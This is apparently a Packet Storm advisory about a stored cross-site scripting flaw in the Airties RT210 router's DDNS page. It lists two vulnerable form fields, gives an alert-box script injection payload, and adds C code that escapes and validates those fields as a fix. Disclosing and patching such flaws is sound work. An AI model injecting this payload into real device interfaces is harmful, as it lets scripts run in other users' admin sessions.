Airties RT210 Cross Site Scripting

2015-06-05T00:00:00
ID PACKETSTORM:132178
Type packetstorm
Reporter B3mB4m
Modified 2015-06-05T00:00:00

Description

                                        
`Airties RT210 Web Interface Stored XSS Vulnerability  
  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: B3mB4m  
[~] Contact : b3mb4m@gmail.com  
[+] Greetz : SYS & & KnocKout & Septemb0x  
############################################################  
  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Hardware/Web App : Airties  
|~Affected Version : AirRT210  
|~Official Web: http://www.airties.com  
|~RISK : High  
  
----------------------------------------------------------  
Proof video: https://www.youtube.com/watch?v=OOZwGeG8p3M  
----------------------------------------------------------  
Post  
----------------------------------------------------------  
Vul Link : http://192.168.2.1/ddns.stm  
  
1) <input maxlength="49" size="50" name="ddns_domainame" value="">  
2) <input maxlength="49" size="50" name="ddns_account" value="">  
  
Payload : '"><SCrIpT>alert("B3mB4m")</ScRiPt>  
`
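
Added example, not part of the original advisory and not AirTies firmware code: a C sketch of the two server-side controls that keep a stored value such as the payload above from breaking out of the `value=""` attribute on `ddns.stm` (allow-list validation when the field is saved, attribute escaping when it is rendered). The function names and the host name policy are assumptions; only the field names, the 49-character limit and the payload string come from the advisory.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Added example (not vendor code): escape src for a quoted HTML attribute.
 * Returns 0 on success, -1 (dst set to "") if dst is too small. */
int html_attr_escape(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    if (dstlen == 0) return -1;
    for (; *src; src++) {
        const char *rep = NULL;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n >= dstlen) { dst[0] = '\0'; return -1; }
        memcpy(dst + o, rep ? rep : src, n);
        o += n;
    }
    dst[o] = '\0';
    return 0;
}

/* Allow-list for the host name field: 1..49 chars (the form's maxlength),
 * ASCII letters, digits, '-' and '.'; no empty label, no label that
 * starts or ends with '-'. Hypothetical policy, not from the advisory. */
int ddns_hostname_ok(const char *s)
{
    size_t len = strlen(s);
    char prev = '.';
    if (len == 0 || len > 49) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (prev == '.' || prev == '-') return 0;
        } else if (c == '-') {
            if (prev == '.') return 0;
        } else if (c > 127 || !isalnum(c)) {
            return 0;
        }
        prev = (char)c;
    }
    return prev != '.' && prev != '-';
}
```

The `maxlength="49"` attribute is enforced only by the browser, so the length check has to be repeated on the device, and the escaping step should still run on every render in case an unvalidated value is already stored.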